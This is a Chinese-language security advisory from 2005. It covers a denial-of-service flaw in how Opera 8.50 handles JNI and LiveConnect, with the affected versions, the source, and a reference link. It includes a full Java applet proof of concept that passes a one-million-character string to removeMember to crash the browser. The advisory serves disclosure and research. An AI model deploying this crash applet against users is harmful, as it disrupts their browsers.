Opera Web浏览器JNI例程处理远程拒绝服务漏洞
发布日期:2005-11-30
更新日期:2005-12-01
受影响系统:Opera Software Opera 8.50
不受影响系统:Opera Software Opera 8.51
描述:
BUGTRAQ ID:
15648
Opera是一款流行的WEB浏览器,支持多种平台。
Opera在处理JNI例程时存在漏洞,远程攻击者可能利用此漏洞对浏览器造成拒绝服务攻击。
使用LiveConnect方式删除JavaScript对象属性的Java代码在某些情况下可能使用空指针。如果用户受骗处理了包含有JNI例程的Java applet的话,就会导致浏览器崩溃。
<*来源:Marc Schoenefeld (
marc.schoenefeld@uni-muenster.de)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=113339026223293&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
import java.applet.Applet;
import java.awt.Graphics;
import netscape.javascript.JSObject;
public class OperaTest extends Applet{
static {
System.out.println("Loaded 1.2");
}
public void paint(Graphics g) {
System.out.println("start");
try {
netscape.javascript.JSObject jso = JSObject.getWindow(this);
System.out.println(jso.getClass());
com.opera.JSObject j = (com.opera.JSObject ) jso;
char[] x = new char[1000000];
for (int y = 0 ; y < x.length; y++) {
x [y] = 'A';
}
String z = new String(x);
System.out.println("after evalb");
j.removeMember(z);
System.out.println("after remove");
}
catch (Exception e) {
e.printStackTrace();
}
}
}
建议:
厂商补丁:
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com浏览次数:2893
严重程度:0(网友投票)
